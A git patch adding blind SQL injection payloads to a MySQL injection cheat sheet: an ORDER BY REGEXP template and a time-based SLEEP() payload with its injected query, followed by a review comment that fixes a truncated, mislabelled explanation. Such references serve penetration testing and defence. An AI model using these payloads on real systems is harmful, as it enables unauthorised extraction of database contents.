From 29fac0602398627d95e981053b53afe951351b87 Mon Sep 17 00:00:00 2001 From: chivato Date: Sun, 1 Mar 2020 21:15:19 +0000 Subject: [PATCH] From https://twitter.com/secgus MySQL Blind Queries and Data Exfiltration via the ORDER BY clause. --- SQL Injection/MySQL Injection.md | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 9dd034c..85d43eb 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -232,6 +232,29 @@ Works with `MySQL >= 5.1` ?id=1 AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A' ``` +### MySQL Blind SQL Injection in ORDER BY clause using a binary query and REGEXP + +This query basically orders by one column or the other, depending on whether the EXISTS() returns a 1 or not. +For the EXISTS() function to return a 1, the REGEXP query needs to match up, this means you can bruteforce blind values character by character and leak data from the database without direct output. + +``` +[...] ORDER BY (SELECT (CASE WHEN EXISTS(SELECT [COLUMN] FROM [TABLE] WHERE [COLUMN] REGEXP "^[BRUTEFORCE CHAR BY CHAR].*" AND [FURTHER OPTIONS / CONDITIONS]) THEN [ONE COLUMN TO ORDER BY] ELSE [ANOTHER COLUMN TO ORDER BY] END)); -- - +``` + +### MySQL Blind SQL Injection binary query using REGEXP. + +Payload: +``` +' OR (SELECT (CASE WHEN EXISTS(SELECT name FROM items WHERE name REGEXP "^a.*") THEN SLEEP(3) ELSE 1 END)); -- - +``` + +Would work in the query (where the "where" clause is the injection point): +``` +SELECT name,price FROM items WHERE name = '' OR (SELECT (CASE WHEN EXISTS(SELECT name FROM items WHERE name REGEXP "^a.*") THEN SLEEP(3) ELSE 1 END)); -- -'; +``` + +In said query, it will check to see if an item exists in the "name" column in the "items" database that starts with an "a". If it will sleep for 3 seconds per item. + ### MYSQL Blind using a conditional statement TRUE: `if @@version starts with a 5`:
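Review bot: the closing explanation of the second added section is truncated and mislabels an object; `In said query, it will check to see if an item exists in the "name" column in the "items" database that starts with an "a". If it will sleep for 3 seconds per item.` should read along the lines of `... in the "items" table that starts with an "a". If one does, the query sleeps for 3 seconds.` since `items` is the table in `SELECT name FROM items`, and the second sentence is missing its condition. Two smaller points in the same hunk: the second heading, `### MySQL Blind SQL Injection binary query using REGEXP.`, ends with a period while the neighbouring headings do not, and its example is time-based (`SLEEP(3)`) in the WHERE clause rather than the ORDER BY technique of the first heading, so a title such as `MySQL Blind SQL Injection time-based using REGEXP` would describe it more accurately and help readers looking for detection and mitigation guidance (the `SLEEP()` pattern is what response-time monitoring and query logging will surface).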